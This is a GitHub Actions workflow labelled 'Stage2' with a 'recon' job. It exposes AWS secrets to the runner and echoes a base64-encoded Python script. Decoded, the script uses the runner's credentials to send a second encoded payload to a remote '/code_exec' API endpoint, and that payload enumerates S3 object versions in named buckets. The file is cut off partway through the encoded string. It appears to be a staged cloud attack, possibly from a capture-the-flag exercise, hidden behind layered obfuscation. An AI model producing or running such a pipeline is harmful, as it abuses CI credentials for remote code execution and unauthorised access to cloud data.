name: Stage2
on:
  push:
    branches: [corgi]

permissions:
  contents: read

jobs:
  recon:
    runs-on: ubuntu-latest
    env:
      AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
      AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
      AWS_SESSION_TOKEN: ${{ secrets.AWS_SESSION_TOKEN }}
      AWS_DEFAULT_REGION: us-east-1
    steps:
      - name: Who am I
        run: aws sts get-caller-identity
        
      - name: Version recon via Lambda
        run: |
          pip install requests requests-aws4auth --quiet
          echo 'aW1wb3J0IGJvdG8zLCBiYXNlNjQsIHJlcXVlc3RzCmZyb20gcmVxdWVzdHNfYXdzNGF1dGggaW1wb3J0IEFXUzRBdXRoCgpBUEkgPSAnaHR0cHM6Ly9sOHNzeWF6NjlmLmV4ZWN1dGUtYXBpLnVzLWVhc3QtMS5hbWF6b25hd3MuY29tL2Rldi9jb2RlX2V4ZWMnCmNyZWRzID0gYm90bzMuU2Vzc2lvbigpLmdldF9jcmVkZW50aWFscygpLmdldF9mcm96ZW5fY3JlZGVudGlhbHMoKQphdXRoID0gQVdTNEF1dGgoY3JlZHMuYWNjZXNzX2tleSwgY3JlZHMuc2VjcmV0X2tleSwgJ3VzLWVhc3QtMScsICdleGVjdXRlLWFwaScsIHNlc3Npb25fdG9rZW49Y3JlZHMudG9rZW4pCgpwYXlsb2FkID0gJ0NtbHRjRzl5ZENCaWIzUnZNeXdnYW5OdmJpd2dkR2x0WlFweklEMGdZbTkwYnpNdVkyeHBaVzUwS0Nkek15Y3NJSEpsWjJsdmJsOXVZVzFsUFNkMWN5MWxZWE4wTFRFbktRcHlaWE1nUFNCN2ZRb0tabTl5SUdJZ2FXNGdXeWQxYzJWeVlXUTRPR1V5WWpFMk9HRmhNemczWlNjc0lDZHNiMmRoWkRnNFpUSmlNVFk0WVdFek9EZGxKMTA2Q2lBZ0lDQjBjbms2Q2lBZ0lDQWdJQ0FnZGlBOUlITXViR2x6ZEY5dlltcGxZM1JmZG1WeWMybHZibk1vUW5WamEyVjBQV0lwQ2lBZ0lDQWdJQ0FnZG1WeWMybHZibk1nUFNCYlhRb2dJQ0FnSUNBZ0lHWnZjaUJ2WW1vZ2FXNGdkaTVuWlhRb0oxWmxjbk5wYjI1ekp5d2dXMTBwT2dvZ0lDQWdJQ0FnSUNBZ0lDQjJaWEp6YVc5dWN5NWhjSEJsYm1Rb2V5ZExaWGtuT2lCdlltcGJKMHRsZVNkZExDQW5WbVZ5YzJsdmJrbGtKem9nYjJKcVd5ZFdaWEp6YVc5dVNXUW5YU3dnSjBselRHRjBaWE4wSnpvZ2IySnFXeWRKYzB4aGRHVnpkQ2Rk
